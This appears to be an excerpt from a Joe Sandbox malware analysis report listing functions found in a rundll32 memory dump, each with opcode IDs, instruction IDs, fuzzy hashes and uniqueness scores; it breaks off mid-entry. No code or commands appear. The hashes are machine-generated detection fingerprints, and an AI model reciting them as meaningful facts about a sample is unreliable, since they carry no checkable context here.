                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88739c013d6cef50738f2b91d6c5d11c2fbfbd4628ba8e09b9d4a2b5f31fc8e5
                                                                          • Instruction ID: 80515a4b21a358d2e8aed3da861342e4fec3512f286b34b46eac52de387bfd5d
                                                                          • Opcode Fuzzy Hash: 88739c013d6cef50738f2b91d6c5d11c2fbfbd4628ba8e09b9d4a2b5f31fc8e5
                                                                          • Instruction Fuzzy Hash: 0F41D575A11518DFCB14DFA9D4849ADBBF6FF89310B258069E905EB361DB30EC41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3F70, Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 788b463b18e1422c75ac3bf7f8290e2ed8861125d4c8d38f672b0e7aa7085af0
                                                                          • Instruction ID: e154d24b84a929b3b580e2731d47ea6d35fc9f37560230c440b30f0c7fa64b6e
                                                                          • Opcode Fuzzy Hash: 788b463b18e1422c75ac3bf7f8290e2ed8861125d4c8d38f672b0e7aa7085af0
                                                                          • Instruction Fuzzy Hash: C631B475A116189FCB14DFA9D88499DBBF6FF8D310B258069E905EB361DB30EC41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B5B00, Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ddf5e5b6030d852498fcf63ed133098f75a61a241a6c4dd67fdf835c94452f5d
                                                                          • Instruction ID: e6a2980b1a1e675d1a8fd98893c945dad12d5667b5f88941e9113fbd9dd886f5
                                                                          • Opcode Fuzzy Hash: ddf5e5b6030d852498fcf63ed133098f75a61a241a6c4dd67fdf835c94452f5d
                                                                          • Instruction Fuzzy Hash: E031E7346006059FC724DF2AD4586AAB7F2FF89318B144A28D596DB6A0EB30E946DFD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3254, Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 83653ebaaf45770df0f6b12615ced25e8b42840eaf3b89b45b87fb3408e70489
                                                                          • Instruction ID: d8cba41f2f8141be5cfcba40dbc1da4db0a7005b448e91e6d9d16efd278fa7d8
                                                                          • Opcode Fuzzy Hash: 83653ebaaf45770df0f6b12615ced25e8b42840eaf3b89b45b87fb3408e70489
                                                                          • Instruction Fuzzy Hash: 8A21602130A3146FD715567564547FF7B9BEFC9254F048027E9499B3C1CE24AD01A7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7018, Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3d49373fb0dfa9337b7b835ecc2bb9b42ddc31dd1dabbe8aacfab9f16a48e9a6
                                                                          • Instruction ID: 3879fed08f90fb392d56e213d47a0d3916c51209a60969c5f5090f0bff3436ca
                                                                          • Opcode Fuzzy Hash: 3d49373fb0dfa9337b7b835ecc2bb9b42ddc31dd1dabbe8aacfab9f16a48e9a6
                                                                          • Instruction Fuzzy Hash: 042128353046156F8790AE78A8914DF7B97FFC9218324892BE54ACB355DF70EE0457E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B38A7, Relevance: .1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb5e6c3d25c634da9ba43992a97f991d8a5be8cd41a32c90b5bc6b8bc6168207
                                                                          • Instruction ID: d3161c22b22d7abb61568f453a895509fa8aab4ad8163a776c09545001149e6c
                                                                          • Opcode Fuzzy Hash: cb5e6c3d25c634da9ba43992a97f991d8a5be8cd41a32c90b5bc6b8bc6168207
                                                                          • Instruction Fuzzy Hash: B521E0317012055FDB149F64A8447FF77AAFFC4218F00842DE886DB690EB34E805A7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B5980, Relevance: .1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 92599079c475d802da5deeafabdc9be64b735df5dc14749e7f10849fcd280a90
                                                                          • Instruction ID: a3bae7f92587cd252d44f126735a1721d03a9e8871c7a6400a1f7af534363afa
                                                                          • Opcode Fuzzy Hash: 92599079c475d802da5deeafabdc9be64b735df5dc14749e7f10849fcd280a90
                                                                          • Instruction Fuzzy Hash: 8C310A346006058FC764DF2AD4946AAB7F2FF89325B144A18D496DB7A0EB30F946DFD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3274, Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c06ea7511df39ef95f02917cb0ffed291bcd2f34be8272c7e303965a3b0b887
                                                                          • Instruction ID: 8239e87d0c5d85d6ac0b5978e0ac40487f153fcf57113ad74ca3d2b3f82ee755
                                                                          • Opcode Fuzzy Hash: 0c06ea7511df39ef95f02917cb0ffed291bcd2f34be8272c7e303965a3b0b887
                                                                          • Instruction Fuzzy Hash: 37216B316023697FEB1136A568157FB3F4DEF82264F148466EE88AA142C934A841A3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B5800, Relevance: .1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cf7248aaf77200de2ba49223c767628afebbc2a34ed37f38dc2754870c9edf1
                                                                          • Instruction ID: 3a17e3888cd22969d793b0934a9c7b604580b484a6c9895ec1192f3c8fd8b7f4
                                                                          • Opcode Fuzzy Hash: 0cf7248aaf77200de2ba49223c767628afebbc2a34ed37f38dc2754870c9edf1
                                                                          • Instruction Fuzzy Hash: CB212C34B002099FDB189E59D454BAEBBF5FB48358F244869E486E7390EB71EC01DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B71E8, Relevance: .1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce96efcf501d94594c5a6370749a8e4b1cd6443a315df44d9372e741172ad7f4
                                                                          • Instruction ID: ade3e3c8fcf9e26cf8ffd05cb3290a3b6cb3fc1c9dbfee62c93e83592e5606b5
                                                                          • Opcode Fuzzy Hash: ce96efcf501d94594c5a6370749a8e4b1cd6443a315df44d9372e741172ad7f4
                                                                          • Instruction Fuzzy Hash: 62212F35B012049BDB149FA0E9556AEBBB7BFC8704F108429E502A7790DF74AD49EBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B32BC, Relevance: .1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4241849cfefad39995dae86320ee65874b69df0ff9dfed507964459fd2b6996a
                                                                          • Instruction ID: 793fccc2f2525e97e8c5f39b02a09463394f972ef9a8ab014e84fa01c07d1a4a
                                                                          • Opcode Fuzzy Hash: 4241849cfefad39995dae86320ee65874b69df0ff9dfed507964459fd2b6996a
                                                                          • Instruction Fuzzy Hash: C521F831B052559FEB25EF7498543BE7BA7FBC2208F14846AE84497381DA74AC01E7D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1072, Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ef258a42cb7c673e6e52dd8c82bc5aaf0f46a45d6bd2fb2737b254395a08f1f
                                                                          • Instruction ID: 77839c87c1ef63840931949f1168112c468548b76c50f61c9fe41113d6123679
                                                                          • Opcode Fuzzy Hash: 0ef258a42cb7c673e6e52dd8c82bc5aaf0f46a45d6bd2fb2737b254395a08f1f
                                                                          • Instruction Fuzzy Hash: 0511EB76B01618A7EB148AA598507FF77EEEBC4294F04803AD906D7381EA74DD0297D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B71D8, Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9fb6e32d62c7b772b17fc7fd94efb910d776300e08963dc72d7ab879eff73894
                                                                          • Instruction ID: c0142d8dc5c1b0d6a193e05e6b085e067239324ac339b07bcaa5f83d9af9b704
                                                                          • Opcode Fuzzy Hash: 9fb6e32d62c7b772b17fc7fd94efb910d776300e08963dc72d7ab879eff73894
                                                                          • Instruction Fuzzy Hash: C8212E34B012049BDB149FA0E8997AEBBB3BFC8704F244429F542A7790DF746D49EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B21E8, Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f8d1c26c547819a0bd3ffae473e8455a13f98ea18a33eaa149fe9a0ed303f9d
                                                                          • Instruction ID: 93596052746db2805aa574ae7c9e39c301b30445c3fc72388015b079587a97df
                                                                          • Opcode Fuzzy Hash: 6f8d1c26c547819a0bd3ffae473e8455a13f98ea18a33eaa149fe9a0ed303f9d
                                                                          • Instruction Fuzzy Hash: 0B219235A052449FCB46CF74D4408DDBFB1FF49314B1481AAE945DF362D736A846DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B57F0, Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e46805b3f5a0f80e5c58f7b43330411ba53d9509e7d4726170e626c43cf8f62c
                                                                          • Instruction ID: cfc207b6fa693201ca27a5912624dce1b76954f91559461ed48c67f0da283985
                                                                          • Opcode Fuzzy Hash: e46805b3f5a0f80e5c58f7b43330411ba53d9509e7d4726170e626c43cf8f62c
                                                                          • Instruction Fuzzy Hash: 63216F34B002099FCB14DE68D454BEEB7F5FB49354F244869E486E7380EB70EC009BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7040, Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb81d1f6ea3e6b5a289ab98c1454c046e67eb7e49ddb918ce839727f83f95346
                                                                          • Instruction ID: 31dcbbafae75044ae3e086d233b543b1ccec8f1635cae301b36158629841ff96
                                                                          • Opcode Fuzzy Hash: eb81d1f6ea3e6b5a289ab98c1454c046e67eb7e49ddb918ce839727f83f95346
                                                                          • Instruction Fuzzy Hash: 0E11B131304615AF8751AF78A89189B7BE7EFC92143148A2BF50ACB351DF70ED044BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1440, Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84eb038b3279b4ca74499df1efefe0163acd96b12d6139717493f57482e98db6
                                                                          • Instruction ID: 77100f74376b0008fc419188f31bc6358dd101efa058cc3b38396f1861a72873
                                                                          • Opcode Fuzzy Hash: 84eb038b3279b4ca74499df1efefe0163acd96b12d6139717493f57482e98db6
                                                                          • Instruction Fuzzy Hash: 0411277090E7851FC716AF70A8761A53F69DE8361871644EEC18ACF193EA24DC0AD3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7E2B, Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e111b85e1eb735509bb84199d2c06533e70dfb4cce7e8cf0ae3234c07bb1fe5
                                                                          • Instruction ID: 3553891a01d474b4eb87b7c3cad2d914af2a3366d4802714ab42aeca25b86f4f
                                                                          • Opcode Fuzzy Hash: 0e111b85e1eb735509bb84199d2c06533e70dfb4cce7e8cf0ae3234c07bb1fe5
                                                                          • Instruction Fuzzy Hash: 2A215430A111059BEB14EFB5D864AEAB7BAEFCC358F244019E405AB380DE756D46DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3264, Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b8735d2f0b9b49728492b7ca80eaae4ab1d43b8feef5f76adc54820c2a5869b
                                                                          • Instruction ID: fe2d95e07af4deb27f31b235411ff6beb48412c7425ae6e85bf2b0cdc2fae0f3
                                                                          • Opcode Fuzzy Hash: 4b8735d2f0b9b49728492b7ca80eaae4ab1d43b8feef5f76adc54820c2a5869b
                                                                          • Instruction Fuzzy Hash: ED1125207152655BFB24367524143FF7BDEABC5618F20153ADD86FB2C1DD98AC0223E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B2258, Relevance: .1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 184e271e7925e9262f20c61fd92330c2aed082fa80de6148a42a0b32dd7bfb77
                                                                          • Instruction ID: cee81c3e92d23b95fd3c85aa2c11cf2fcc377fe1ad522776645566b7189b9f27
                                                                          • Opcode Fuzzy Hash: 184e271e7925e9262f20c61fd92330c2aed082fa80de6148a42a0b32dd7bfb77
                                                                          • Instruction Fuzzy Hash: 36214775A112049FCB44DF69D8809DEBBF1FF8C724F10816AE805AB321DB31A842CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3BB9, Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d684224f087d081c2ce019a85058b9e8951247aa3ee9cf47df0b80027092fa58
                                                                          • Instruction ID: 8dfbddc7671bc1249d6d9e02fc8e5df7b00a348408a1c711d04bf6c2cf1c0f8a
                                                                          • Opcode Fuzzy Hash: d684224f087d081c2ce019a85058b9e8951247aa3ee9cf47df0b80027092fa58
                                                                          • Instruction Fuzzy Hash: DE218734A002059BEB14EFA5D854AEE77B6FFCC314F144029E845AB390DE35AC55DBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7050, Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d2076a37ad6835ef1777fe6510c4a573c8d7b84d8cc0f9fba94bc928d35c74e4
                                                                          • Instruction ID: 85d9fa392e019bde21d2d246936e82e8124372050976fb7c4a1ac5c93835b85e
                                                                          • Opcode Fuzzy Hash: d2076a37ad6835ef1777fe6510c4a573c8d7b84d8cc0f9fba94bc928d35c74e4
                                                                          • Instruction Fuzzy Hash: FC11A331300615AF8780AF79E49199BB7D7EFC96247148A2BE90ACB351EF70ED044BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B6FD0, Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0d3971e6111d9f2a318e796cb5cb69df8e2ec7bceb857afbd6cb634f33c81704
                                                                          • Instruction ID: ec0eb3ef520ad4f11e96c6ddb0c53dc4877831acb9f23b0f1284b8d84b8327f9
                                                                          • Opcode Fuzzy Hash: 0d3971e6111d9f2a318e796cb5cb69df8e2ec7bceb857afbd6cb634f33c81704
                                                                          • Instruction Fuzzy Hash: 141191313046169F8740AF78E4915DBB793EFC86147148A2BE94ACF251EF70ED055BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3BC8, Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb691da06e7abf564940a52559256a4ce35a47a42495c0d542754015d9d52607
                                                                          • Instruction ID: 1bab39c9bf5379249de5f43431ca54f3ac148e01a3fd8b601ef66f7a188b4111
                                                                          • Opcode Fuzzy Hash: eb691da06e7abf564940a52559256a4ce35a47a42495c0d542754015d9d52607
                                                                          • Instruction Fuzzy Hash: 77113034A001059BEB14EFA5D864AEA77B6FFCC314F148029E409AB390DE75AC45DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7E38, Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9482eca352aae455b55a0f17a3f8fda9c3198b0aa6cebf443105fd8b77511ded
                                                                          • Instruction ID: 0b0c71e224ca30aaa01aba6b473cceb9761e216165c1721d48a6e35376a26642
                                                                          • Opcode Fuzzy Hash: 9482eca352aae455b55a0f17a3f8fda9c3198b0aa6cebf443105fd8b77511ded
                                                                          • Instruction Fuzzy Hash: E1114F30A011059BEB54EFB5D464AA9B7B6FFCC319F244029E409AB380CE79BC45DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1958, Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d1fad9cc3fff608b8c8542ad8bf36413b41ca3ca863b1565266fc63cfdcfa08
                                                                          • Instruction ID: fb67dcba0b32003cf7e6e89bb863c965345ecceab7b7dd69a006cfe7c2a3628c
                                                                          • Opcode Fuzzy Hash: 1d1fad9cc3fff608b8c8542ad8bf36413b41ca3ca863b1565266fc63cfdcfa08
                                                                          • Instruction Fuzzy Hash: E7118131601114EFDB14DFA5D855AA97BBAEF8C328F249019E409AB380DF39AC46CFD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1378, Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a60f9693a273c74d7111afe8c2c047dc43411e40d2332c2c3efb2e1f1be0c657
                                                                          • Instruction ID: 41a2c9fe8f07f69af515e6cc5968d3e37fe105184281e9d8b167b530e2d7e483
                                                                          • Opcode Fuzzy Hash: a60f9693a273c74d7111afe8c2c047dc43411e40d2332c2c3efb2e1f1be0c657
                                                                          • Instruction Fuzzy Hash: 712115B0D046088FCB10DFAAD4856EEFBF0FF48214F10842AD559A7240DB79A906CFA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B4602, Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 149c0eb95b7c1250a053187b8f636f7fca5399f3f346a473030f1bd57c812a1d
                                                                          • Instruction ID: cde2acf397ec6693b4e76e278d2e9fbe16df83257b94cba1e030e8e36736b7ff
                                                                          • Opcode Fuzzy Hash: 149c0eb95b7c1250a053187b8f636f7fca5399f3f346a473030f1bd57c812a1d
                                                                          • Instruction Fuzzy Hash: A011E5307052045BD714AB69D8146EFBBF6AFCA644F14846DD041AB391CE749D06DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B702D, Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aac7fcd975d1d8b5ffae71a8011314a0669916fe931e2deb1cb68ba904e9c85e
                                                                          • Instruction ID: 75387cd439d5dfd5cc76c180976add9fbe3b5f5cc0497c7f8d516f9eafae5776
                                                                          • Opcode Fuzzy Hash: aac7fcd975d1d8b5ffae71a8011314a0669916fe931e2deb1cb68ba904e9c85e
                                                                          • Instruction Fuzzy Hash: 5511E531304A66AFC741AF7CE45159BBBD2EFC92243218A2BE556CB291DF70ED058BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1380, Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd145404f76ea4b0c3a46109b51e7ab2b5f4a5a7637604c1a8208cd4663de12e
                                                                          • Instruction ID: 2f002d5bb50851885d31bedec3f5c39981cca2be911d866acffdb45b0b7890e3
                                                                          • Opcode Fuzzy Hash: fd145404f76ea4b0c3a46109b51e7ab2b5f4a5a7637604c1a8208cd4663de12e
